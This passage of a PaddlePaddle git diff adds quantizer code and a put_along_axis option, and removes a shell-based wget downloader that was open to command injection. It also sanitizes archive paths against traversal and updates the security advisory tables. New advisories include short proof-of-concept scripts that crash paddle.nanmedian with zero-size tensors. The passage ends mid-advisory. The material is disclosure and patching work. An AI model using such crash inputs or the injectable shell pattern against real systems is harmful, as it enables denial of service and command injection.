self._zero_point = None + + def forward(self, inputs): + self._max = self._cal_abs_max(inputs) + return inputs + + def _cal_abs_max(self, inputs): + """Use group_size to group the input, then use the + absmax method to calculate the scale + """ + input_shape = inputs.shape + assert ( + self.group_size == 64 or self.group_size == 128 + ), "group_size only support 64 or 128" + assert ( + inputs.shape[0] % self.group_size == 0 + ), "group_size must be a factor of input channels" + assert len(inputs.shape) == 2, "Currently only support 2D tensor" + input_processed = inputs.transpose([1, 0]).reshape( + [input_shape[1], input_shape[0] // self.group_size, self.group_size] + ) + + abs_max_values = paddle.max(paddle.abs(input_processed), axis=2).cast( + "float32" + ) + abs_max_values = paddle.where( + abs_max_values == np.float32(0), np.float32(1e-8), abs_max_values + ) + abs_max_values = abs_max_values.transpose([1, 0]) + return abs_max_values + + def min_value(self) -> float: + return 0.0 + + def max_value(self) -> float: + return self._max + + def bit_length(self): + return self._quant_bits + + def quant_axis(self): + return -1 + + def cal_thresholds(self): + """Compute thresholds for MAX function.""" + if self._scale is None: + self._scale = self._max + self._zero_point = paddle.zeros_like(self._scale) + + def scales(self): + """Return output scales.""" + if self._scale is None: + self.cal_thresholds() + return self._scale + + def zero_points(self): + """Return output zero points.""" + if self._zero_point is None: + self.cal_thresholds() + return self._zero_point diff --git a/python/paddle/quantization/quantize.py b/python/paddle/quantization/quantize.py index b7887ffc46e1c4..7606c4bb3e1827 100644 --- a/python/paddle/quantization/quantize.py +++ b/python/paddle/quantization/quantize.py @@ -28,8 +28,9 @@ class Quantization(metaclass=abc.ABCMeta): r""" Abstract class used to prepares a copy of the model for quantization calibration or quantization-aware training. 
+ Args: - config(QuantConfig) - Quantization configuration + config(QuantConfig): Quantization configuration """ def __init__(self, config: QuantConfig): @@ -43,10 +44,11 @@ def quantize(self, model: Layer, inplace=False): def convert(self, model: Layer, inplace=False, remain_weight=False): r"""Convert the quantization model to ONNX style. And the converted model can be saved as inference model by calling paddle.jit.save. + Args: - model(Layer) - The quantized model to be converted. - inplace(bool, optional) - Whether to modify the model in-place, default is False. - remain_weight(bool, optional) - Whether to remain weights in floats, default is False. + model(Layer): The quantized model to be converted. + inplace(bool, optional): Whether to modify the model in-place, default is False. + remain_weight(bool, optional): Whether to remain weights in floats, default is False. Return: The converted model @@ -72,7 +74,12 @@ def convert(self, model: Layer, inplace=False, remain_weight=False): for name, child in _model.named_children(): quant_dequant = None if isinstance(child, ConvertibleQuantedLayer): - if child.weight_quanter.scales() is None: + if child.converted: + continue + if ( + child.weight_quanter is None + or child.weight_quanter.scales() is None + ): continue child._convert(remain_weight=remain_weight) elif isinstance(child, BaseQuanter): diff --git a/python/paddle/tensor/manipulation.py b/python/paddle/tensor/manipulation.py index 87cb258952f9e4..d8ee8698e2d70e 100644 --- a/python/paddle/tensor/manipulation.py +++ b/python/paddle/tensor/manipulation.py @@ -5308,11 +5308,12 @@ def put_along_axis( Args: arr (Tensor) : The Destination Tensor. Supported data types are float32 and float64. indices (Tensor) : Indices to put along each 1d slice of arr. This must match the dimension of arr, - and need to broadcast against arr. Supported data type are int and int64. + and need to broadcast against arr if broadcast is 'True'. Supported data type are int and int64. + values (Tensor) : The value element(s) to put. The data types should be same as arr. axis (int) : The axis to put 1d slices along. - reduce (str, optional): The reduce operation, default is 'assign', support 'add', 'assign', 'mul' and 'multiply'. - include_self (bool, optional): whether to reduce with the elements of arr. (Only support True now) - broadcast (bool, optional): whether to broadcast indices. + reduce (str, optional): The reduce operation, default is 'assign', support 'add', 'assign', 'mul', 'multiply', "mean", "amin" and "amax". + include_self (bool, optional): whether to reduce with the elements of arr, default is 'True'. + broadcast (bool, optional): whether to broadcast indices, default is 'True'. 
Returns: Tensor, The indexed element, same dtype with arr @@ -5332,9 +5333,45 @@ def put_along_axis( [[99, 99, 99], [60, 40, 50]]) + >>> index = paddle.zeros((2,2)).astype("int32") + >>> value=paddle.to_tensor([[1,2],[3,4]]).astype(x.dtype) + >>> result = paddle.put_along_axis(x, index, value, 0, "add", True, False) + >>> print(result) + Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True, + [[14, 36, 20], + [60, 40, 50]]) + + >>> result = paddle.put_along_axis(x, index, value, 0, "mul", True, False) + >>> print(result) + Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True, + [[30 , 240, 20 ], + [60 , 40 , 50 ]]) + + >>> result = paddle.put_along_axis(x, index, value, 0, "mean", True, False) + >>> print(result) + Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True, + [[4 , 12, 20], + [60, 40, 50]]) + + >>> result = paddle.put_along_axis(x, index, value, 0, "amin", True, False) + >>> print(result) + Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True, + [[1 , 2 , 20], + [60, 40, 50]]) + + >>> result = paddle.put_along_axis(x, index, value, 0, "amax", True, False) + >>> print(result) + Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True, + [[10, 30, 20], + [60, 40, 50]]) + + >>> result = paddle.put_along_axis(x, index, value, 0, "add", False, False) + >>> print(result) + Tensor(shape=[2, 3], dtype=int64, place=Place(cpu), stop_gradient=True, + [[4 , 6 , 20], + [60, 40, 50]]) + """ - if not include_self: - raise ValueError("`include_self` is only support True now.") if len(arr.shape) != len(indices.shape): raise ValueError( "`indices` and `arr` must have the same number of dimensions!" @@ -5381,7 +5418,15 @@ def put_along_axis( ) ) if in_dynamic_or_pir_mode(): - return _C_ops.put_along_axis(arr, indices, values, axis, reduce) + if convert_dtype(indices.dtype) not in ['int32', 'int64']: + raise TypeError( + "The data type of indices should be one of ['int32', 'int64'], but got {}".format( + str(convert_dtype(indices.dtype)) + ) + ) + return _C_ops.put_along_axis( + arr, indices, values, axis, reduce, include_self + ) else: check_variable_and_dtype( arr, @@ -5400,20 +5445,27 @@ def put_along_axis( check_variable_and_dtype( indices, 'index', ['int32', 'int64'], 'put_along_axis' ) + check_type(include_self, 'include_self', bool, 'put_along_axis') helper = LayerHelper('put_along_axis', **locals()) dtype = helper.input_dtype() result = helper.create_variable_for_type_inference(dtype) helper.append_op( type="put_along_axis", inputs={"Input": arr, "Index": indices, "Value": values}, - attrs={"Axis": axis, "Reduce": reduce}, + attrs={ + "Axis": axis, + "Reduce": reduce, + "Include_self": include_self, + }, outputs={"Result": result}, ) return result @inplace_apis_in_dygraph_only -def put_along_axis_(arr, indices, values, axis, reduce='assign'): +def put_along_axis_( + arr, indices, values, axis, reduce='assign', include_self=True +): r""" Inplace version of ``put_along_axis`` API, the output Tensor will be inplaced with input ``arr``. Please refer to :ref:`api_paddle_put_along_axis`. 
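A short usage sketch of the in-place variant with the new `include_self` flag; the shapes and values below are illustrative only and the exact output is not asserted here:

```python
import paddle

x = paddle.to_tensor([[10., 30., 20.], [60., 40., 50.]])
index = paddle.to_tensor([[0, 0, 0], [1, 1, 1]], dtype='int64')
values = paddle.ones([2, 3])

# With include_self=False, each written slot accumulates only the put values;
# slots that receive no value keep their original entries.
paddle.put_along_axis_(x, index, values, 0, 'add', include_self=False)
print(x)
```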
@@ -5432,7 +5484,9 @@ def put_along_axis_(arr, indices, values, axis, reduce='assign'): if broadcast_shape: indices = paddle.broadcast_to(indices, broadcast_shape) values = paddle.broadcast_to(values, indices.shape) - return _C_ops.put_along_axis_(arr, indices, values, axis, reduce) + return _C_ops.put_along_axis_( + arr, indices, values, axis, reduce, include_self + ) def index_add(x, index, axis, value, name=None): diff --git a/python/paddle/utils/cpp_extension/extension_utils.py b/python/paddle/utils/cpp_extension/extension_utils.py index e64f5e6a25b3f6..2ebff3f5cf25de 100644 --- a/python/paddle/utils/cpp_extension/extension_utils.py +++ b/python/paddle/utils/cpp_extension/extension_utils.py @@ -1326,6 +1326,7 @@ def _jit_compile(file_path, verbose=False): """ Build shared library in subprocess """ + assert os.path.exists(file_path) ext_dir = os.path.dirname(file_path) setup_file = os.path.basename(file_path) diff --git a/python/paddle/utils/download.py b/python/paddle/utils/download.py index b9ca1f35976c63..de1c36bdddfab1 100644 --- a/python/paddle/utils/download.py +++ b/python/paddle/utils/download.py @@ -16,12 +16,10 @@ import os import os.path as osp import shutil -import subprocess import sys import tarfile import time import zipfile -from urllib.parse import urlparse import httpx @@ -197,39 +195,7 @@ def _get_download(url, fullname): return False -def _wget_download(url: str, fullname: str): - try: - assert urlparse(url).scheme in ( - 'http', - 'https', - ), 'Only support https and http url' - # using wget to download url - tmp_fullname = fullname + "_tmp" - # –user-agent - command = f'wget -O {tmp_fullname} -t {DOWNLOAD_RETRY_LIMIT} {url}' - subprc = subprocess.Popen( - command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE - ) - _ = subprc.communicate() - - if subprc.returncode != 0: - raise RuntimeError( - f'{command} failed. Please make sure `wget` is installed or {url} exists' - ) - - shutil.move(tmp_fullname, fullname) - - except Exception as e: # requests.exceptions.ConnectionError - logger.info(f"Downloading {url} failed with exception {str(e)}") - return False - - return fullname - - -_download_methods = { - 'get': _get_download, - 'wget': _wget_download, -} +_download_methods = {'get': _get_download} def _download(url, path, md5sum=None, method='get'): @@ -311,7 +277,10 @@ def _decompress(fname): def _uncompress_file_zip(filepath): with zipfile.ZipFile(filepath, 'r') as files: - file_list = files.namelist() + file_list_tmp = files.namelist() + file_list = [] + for file in file_list_tmp: + file_list.append(file.replace("../", "")) file_dir = os.path.dirname(filepath) @@ -340,7 +309,13 @@ def _uncompress_file_zip(filepath): def _uncompress_file_tar(filepath, mode="r:*"): with tarfile.open(filepath, mode) as files: - file_list = files.getnames() + file_list_tmp = files.getnames() + file_list = [] + for file in file_list_tmp: + assert ( + file[0] != "/" + ), f"uncompress file path {file} should not start with /" + file_list.append(file.replace("../", "")) file_dir = os.path.dirname(filepath) diff --git a/security/README.md b/security/README.md index 01559632d7dd45..7a1c6df5a5f7a5 100644 --- a/security/README.md +++ b/security/README.md @@ -7,12 +7,30 @@ We regularly publish security advisories about using PaddlePaddle. *Note*: In conjunction with these security advisories, we strongly encourage PaddlePaddle users to read and understand PaddlePaddle's security model as outlined in [SECURITY.md](../SECURITY.md). 
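The `_uncompress_file_zip` / `_uncompress_file_tar` changes above sanitize archive member names before extraction. A minimal standalone sketch of the same idea, combining the zip `../` stripping with the tar absolute-path check (an illustration, not the Paddle implementation itself):

```python
import zipfile


def sanitized_member_names(archive_path: str):
    """Return zip member names with path-traversal components removed."""
    with zipfile.ZipFile(archive_path, "r") as zf:
        names = zf.namelist()
    cleaned = []
    for name in names:
        if name.startswith("/"):
            raise ValueError(f"absolute member path not allowed: {name}")
        # Drop "../" so a member such as "../../etc/crontab" cannot be written
        # outside the intended extraction directory.
        cleaned.append(name.replace("../", ""))
    return cleaned
```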
-| Advisory Number | Type | Versions affected | Reported by | Additional Information | -|----------------------------------------------|------------------------------------------------------|:-----------------:|------------------------------------------------------------------|------------------------| -| [PDSA-2023-005](./advisory/pdsa-2023-005.md) | Command injection in fs.py | < 2.5.0 | Xiaochen Guo from Huazhong University of Science and Technology | | -| [PDSA-2023-004](./advisory/pdsa-2023-004.md) | FPE in paddle.linalg.matrix_power | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2023-003](./advisory/pdsa-2023-003.md) | Heap buffer overflow in paddle.trace | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2023-002](./advisory/pdsa-2023-002.md) | Null pointer dereference in paddle.flip | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2023-001](./advisory/pdsa-2023-001.md) | Use after free in paddle.diagonal | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree | < 2.4 | Wang Xuan(王旋) of Qihoo 360 AIVul Team | | +| Advisory Number | Type | Versions affected | Reported by | Additional Information | +|----------------------------------------------|------------------------------------------------------|:-----------------:|-----------------------------------------------------------------|------------------------| +| [PDSA-2023-023](./advisory/pdsa-2023-023.md) | Command injection in convert_shape_compare | < 2.6.0 | leeya_bug | | +| [PDSA-2023-022](./advisory/pdsa-2023-022.md) | FPE in paddle.argmin and paddle.argmax | < 2.6.0 | Peng Zhou (zpbrent) from Shanghai University | | +| [PDSA-2023-021](./advisory/pdsa-2023-021.md) | Null pointer dereference in paddle.crop | < 2.6.0 | Peng Zhou (zpbrent) from Shanghai University | | +| [PDSA-2023-020](./advisory/pdsa-2023-020.md) | Command injection in _wget_download | < 2.6.0 | huntr.com | | +| [PDSA-2023-019](./advisory/pdsa-2023-019.md) | Command injection in get_online_pass_interval | < 2.6.0 | huntr.com and leeya_bug | | +| [PDSA-2023-018](./advisory/pdsa-2023-018.md) | Heap buffer overflow in paddle.repeat_interleave | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-017](./advisory/pdsa-2023-017.md) | FPE in paddle.amin | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-016](./advisory/pdsa-2023-016.md) | Stack overflow in paddle.linalg.lu_unpack | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-015](./advisory/pdsa-2023-015.md) | FPE in paddle.lerp | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-014](./advisory/pdsa-2023-014.md) | FPE in paddle.topk | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-013](./advisory/pdsa-2023-013.md) | Stack overflow in paddle.searchsorted | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-012](./advisory/pdsa-2023-012.md) | Segfault in paddle.put_along_axis | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-011](./advisory/pdsa-2023-011.md) | Null pointer dereference in paddle.nextafter | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-010](./advisory/pdsa-2023-010.md) | Segfault in paddle.mode | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-009](./advisory/pdsa-2023-009.md) | FPE in paddle.linalg.eig | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-008](./advisory/pdsa-2023-008.md) | Segfault in paddle.dot | < 2.6.0 | Tong Liu of CAS-IIE | | 
+| [PDSA-2023-007](./advisory/pdsa-2023-007.md) | FPE in paddle.linalg.matrix_rank | < 2.6.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-006](./advisory/pdsa-2023-006.md) | FPE in paddle.nanmedian | < 2.6.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-005](./advisory/pdsa-2023-005.md) | Command injection in fs.py | < 2.5.0 | Xiaochen Guo from Huazhong University of Science and Technology | | +| [PDSA-2023-004](./advisory/pdsa-2023-004.md) | FPE in paddle.linalg.matrix_power | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-003](./advisory/pdsa-2023-003.md) | Heap buffer overflow in paddle.trace | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-002](./advisory/pdsa-2023-002.md) | Null pointer dereference in paddle.flip | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-001](./advisory/pdsa-2023-001.md) | Use after free in paddle.diagonal | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree | < 2.4 | Wang Xuan(王旋) of Qihoo 360 AIVul Team | | diff --git a/security/README_cn.md b/security/README_cn.md index 49223df8844f39..7022221643a429 100644 --- a/security/README_cn.md +++ b/security/README_cn.md @@ -4,15 +4,33 @@ -注:我们非常建议飞桨用户阅读和理解[SECURITY_cn.md](../SECURITY_cn.md)所介绍的飞桨安全模型,以便更好地了解此安全公告。 +*注*:我们非常建议飞桨用户阅读和理解[SECURITY_cn.md](../SECURITY_cn.md)所介绍的飞桨安全模型,以便更好地了解此安全公告。 -| 安全公告编号 | 类型 | 受影响版本 | 报告者 | 备注 | -|-------------------------------------------------|------------------------------------------------------|:------------:|-----------------------------------------------------------------|----| -| [PDSA-2023-005](./advisory/pdsa-2023-005_cn.md) | Command injection in fs.py | < 2.5.0 | Xiaochen Guo from Huazhong University of Science and Technology | | -| [PDSA-2023-004](./advisory/pdsa-2023-004_cn.md) | FPE in paddle.linalg.matrix_power | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2023-003](./advisory/pdsa-2023-003_cn.md) | Heap buffer overflow in paddle.trace | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2023-002](./advisory/pdsa-2023-002_cn.md) | Null pointer dereference in paddle.flip | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2023-001](./advisory/pdsa-2023-001_cn.md) | Use after free in paddle.diagonal | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2022-002](./advisory/pdsa-2022-002_cn.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2022-001](./advisory/pdsa-2022-001_cn.md) | OOB read in gather_tree | < 2.4 | Wang Xuan(王旋) of Qihoo 360 AIVul Team | | +| 安全公告编号 | 类型 | 受影响版本 | 报告者 | 备注 | +|-------------------------------------------------|------------------------------------------------------|:-----------:|-----------------------------------------------------------------|----| +| [PDSA-2023-023](./advisory/pdsa-2023-023_cn.md) | Command injection in convert_shape_compare | < 2.6.0 | leeya_bug | | +| [PDSA-2023-022](./advisory/pdsa-2023-022_cn.md) | FPE in paddle.argmin and paddle.argmax | < 2.6.0 | Peng Zhou (zpbrent) from Shanghai University | | +| [PDSA-2023-021](./advisory/pdsa-2023-021_cn.md) | Null pointer dereference in paddle.crop | < 2.6.0 | Peng Zhou (zpbrent) from Shanghai University | | +| [PDSA-2023-020](./advisory/pdsa-2023-020_cn.md) | 
Command injection in _wget_download | < 2.6.0 | huntr.com | | +| [PDSA-2023-019](./advisory/pdsa-2023-019_cn.md) | Command injection in get_online_pass_interval | < 2.6.0 | huntr.com and leeya_bug | | +| [PDSA-2023-018](./advisory/pdsa-2023-018_cn.md) | Heap buffer overflow in paddle.repeat_interleave | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-017](./advisory/pdsa-2023-017_cn.md) | FPE in paddle.amin | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-016](./advisory/pdsa-2023-016_cn.md) | Stack overflow in paddle.linalg.lu_unpack | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-015](./advisory/pdsa-2023-015_cn.md) | FPE in paddle.lerp | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-014](./advisory/pdsa-2023-014_cn.md) | FPE in paddle.topk | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-013](./advisory/pdsa-2023-013_cn.md) | Stack overflow in paddle.searchsorted | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-012](./advisory/pdsa-2023-012_cn.md) | Segfault in paddle.put_along_axis | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-011](./advisory/pdsa-2023-011_cn.md) | Null pointer dereference in paddle.nextafter | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-010](./advisory/pdsa-2023-010_cn.md) | Segfault in paddle.mode | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-009](./advisory/pdsa-2023-009_cn.md) | FPE in paddle.linalg.eig | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-008](./advisory/pdsa-2023-008_cn.md) | Segfault in paddle.dot | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-007](./advisory/pdsa-2023-007_cn.md) | FPE in paddle.linalg.matrix_rank | < 2.6.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-006](./advisory/pdsa-2023-006_cn.md) | FPE in paddle.nanmedian | < 2.6.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-005](./advisory/pdsa-2023-005_cn.md) | Command injection in fs.py | < 2.5.0 | Xiaochen Guo from Huazhong University of Science and Technology | | +| [PDSA-2023-004](./advisory/pdsa-2023-004_cn.md) | FPE in paddle.linalg.matrix_power | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-003](./advisory/pdsa-2023-003_cn.md) | Heap buffer overflow in paddle.trace | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-002](./advisory/pdsa-2023-002_cn.md) | Null pointer dereference in paddle.flip | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-001](./advisory/pdsa-2023-001_cn.md) | Use after free in paddle.diagonal | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2022-002](./advisory/pdsa-2022-002_cn.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2022-001](./advisory/pdsa-2022-001_cn.md) | OOB read in gather_tree | < 2.4 | Wang Xuan(王旋) of Qihoo 360 AIVul Team | | diff --git a/security/README_ja.md b/security/README_ja.md index 4bd0b984c5834c..2711a91396b5e5 100644 --- a/security/README_ja.md +++ b/security/README_ja.md @@ -7,12 +7,30 @@ PaddlePaddle の使用に関するセキュリティ勧告を定期的に発表 *注*: これらのセキュリティ勧告と併せ、PaddlePaddle ユーザーには [SECURITY.md](../SECURITY_ja.md) に記載されている PaddlePaddle のセキュリティモデルを読み、理解することを強くお勧めします。 -| アドバイザリー番号 | タイプ | 対象バージョン | 報告者 | 追加情報 | -|----------------------------------------------|------------------------------------------------------|:-----------------:|------------------------------------------------------------------|------------------------| -| [PDSA-2023-005](./advisory/pdsa-2023-005.md) | Command injection in fs.py | < 2.5.0 | Xiaochen Guo from Huazhong University of Science and Technology 
| | -| [PDSA-2023-004](./advisory/pdsa-2023-004.md) | FPE in paddle.linalg.matrix_power | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2023-003](./advisory/pdsa-2023-003.md) | Heap buffer overflow in paddle.trace | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2023-002](./advisory/pdsa-2023-002.md) | Null pointer dereference in paddle.flip | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2023-001](./advisory/pdsa-2023-001.md) | Use after free in paddle.diagonal | < 2.5.0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University | | -| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree | < 2.4 | Wang Xuan(王旋) of Qihoo 360 AIVul Team | | +| アドバイザリー番号 | タイプ | 対象バージョン | 報告者 | 追加情報 | +|----------------------------------------------|------------------------------------------------------|:-----------:|-----------------------------------------------------------------|------| +| [PDSA-2023-023](./advisory/pdsa-2023-023.md) | Command injection in convert_shape_compare | < 2.6.0 | leeya_bug | | +| [PDSA-2023-022](./advisory/pdsa-2023-022.md) | FPE in paddle.argmin and paddle.argmax | < 2.6.0 | Peng Zhou (zpbrent) from Shanghai University | | +| [PDSA-2023-021](./advisory/pdsa-2023-021.md) | Null pointer dereference in paddle.crop | < 2.6.0 | Peng Zhou (zpbrent) from Shanghai University | | +| [PDSA-2023-020](./advisory/pdsa-2023-020.md) | Command injection in _wget_download | < 2.6.0 | huntr.com | | +| [PDSA-2023-019](./advisory/pdsa-2023-019.md) | Command injection in get_online_pass_interval | < 2.6.0 | huntr.com and leeya_bug | | +| [PDSA-2023-018](./advisory/pdsa-2023-018.md) | Heap buffer overflow in paddle.repeat_interleave | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-017](./advisory/pdsa-2023-017.md) | FPE in paddle.amin | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-016](./advisory/pdsa-2023-016.md) | Stack overflow in paddle.linalg.lu_unpack | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-015](./advisory/pdsa-2023-015.md) | FPE in paddle.lerp | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-014](./advisory/pdsa-2023-014.md) | FPE in paddle.topk | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-013](./advisory/pdsa-2023-013.md) | Stack overflow in paddle.searchsorted | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-012](./advisory/pdsa-2023-012.md) | Segfault in paddle.put_along_axis | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-011](./advisory/pdsa-2023-011.md) | Null pointer dereference in paddle.nextafter | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-010](./advisory/pdsa-2023-010.md) | Segfault in paddle.mode | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-009](./advisory/pdsa-2023-009.md) | FPE in paddle.linalg.eig | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-008](./advisory/pdsa-2023-008.md) | Segfault in paddle.dot | < 2.6.0 | Tong Liu of CAS-IIE | | +| [PDSA-2023-007](./advisory/pdsa-2023-007.md) | FPE in paddle.linalg.matrix_rank | < 2.6.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-006](./advisory/pdsa-2023-006.md) | FPE in paddle.nanmedian | < 2.6.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-005](./advisory/pdsa-2023-005.md) | Command injection in fs.py | < 2.5.0 | Xiaochen Guo from Huazhong University of Science and Technology | | +| [PDSA-2023-004](./advisory/pdsa-2023-004.md) | FPE in paddle.linalg.matrix_power | < 2.5.0 | Tong Liu of 
ShanghaiTech University | | +| [PDSA-2023-003](./advisory/pdsa-2023-003.md) | Heap buffer overflow in paddle.trace | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-002](./advisory/pdsa-2023-002.md) | Null pointer dereference in paddle.flip | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2023-001](./advisory/pdsa-2023-001.md) | Use after free in paddle.diagonal | < 2.5.0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2022-002](./advisory/pdsa-2022-002.md) | Code injection in paddle.audio.functional.get_window | = 2.4.0-rc0 | Tong Liu of ShanghaiTech University | | +| [PDSA-2022-001](./advisory/pdsa-2022-001.md) | OOB read in gather_tree | < 2.4 | Wang Xuan(王旋) of Qihoo 360 AIVul Team | | diff --git a/security/advisory/pdsa-2023-004_cn.md b/security/advisory/pdsa-2023-004_cn.md index c31c4da4f8728f..11f22a45aca11c 100644 --- a/security/advisory/pdsa-2023-004_cn.md +++ b/security/advisory/pdsa-2023-004_cn.md @@ -6,7 +6,7 @@ CVE-2023-38672 ### 影响 -当张量包含纬度值为0的情况,`paddle.linalg.matrix_power`会触发除0异常,导致程序运行时崩溃,PoC代码如下: +当张量包含维度值为0的情况,`paddle.linalg.matrix_power`会触发除0异常,导致程序运行时崩溃,PoC代码如下: ```python import paddle diff --git a/security/advisory/pdsa-2023-006.md b/security/advisory/pdsa-2023-006.md new file mode 100644 index 00000000000000..4997760cd5000a --- /dev/null +++ b/security/advisory/pdsa-2023-006.md @@ -0,0 +1,31 @@ +## PDSA-2023-006: FPE in paddle.nanmedian + +### CVE Number + +CVE-2023-38674 + +### Impact + +When `x` dim calculates `stride` to 0, `paddle.nanmedian` triggers FPE by `numel / stride`. The PoC is as follows: + +```python +import paddle +import numpy as np + +x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32) +x = paddle.to_tensor(x) +paddle.nanmedian(x) +``` + +### Patches + +We have patched the issue in commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1). +The fix will be included in PaddlePaddle 2.6.0. + +### For more information + +Please consult [our security guide](../../SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution + +This vulnerability has been reported by Tong Liu of ShanghaiTech University. 
diff --git a/security/advisory/pdsa-2023-006_cn.md b/security/advisory/pdsa-2023-006_cn.md new file mode 100644 index 00000000000000..e8ac803c033d6a --- /dev/null +++ b/security/advisory/pdsa-2023-006_cn.md @@ -0,0 +1,31 @@ +## PDSA-2023-006: FPE in paddle.nanmedian + +### CVE编号 + +CVE-2023-38674 + +### 影响 + +当由`x`的dim计算的`stride`为0时,`paddle.nanmedian`会由`numel / stride`触发除0异常,PoC代码如下: + +```python +import paddle +import numpy as np + +x = np.random.uniform(0,0,[0,0,0,0,0]).astype(np.float32) +x = paddle.to_tensor(x) +paddle.nanmedian(x) +``` + +### 补丁 + +我们在commit [9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1](https://github.com/PaddlePaddle/Paddle/pull/55644/commits/9bb6c669206c4bcc3ce3f6daf8a55650e190c1a1)中对此问题进行了补丁。 +修复将包含在飞桨2.6.0版本当中。 + +### 更多信息 + +请参考我们的[安全指南](../../SECURITY_cn.md)以获得更多关于安全的信息,以及如何与我们联系问题。 + +### 贡献者 + +此漏洞由 Tong Liu of ShanghaiTech University 提交。 diff --git a/security/advisory/pdsa-2023-007.md b/security/advisory/pdsa-2023-007.md new file mode 100644 index 00000000000000..f61223193cabfe --- /dev/null +++ b/security/advisory/pdsa-2023-007.md @@ -0,0 +1,31 @@ +## PDSA-2023-007: FPE in paddle.linalg.matrix_rank + +### CVE Number + +CVE-2023-38675 + +### Impact + +When `x` dim calculates `rows` or `cols` to 0, 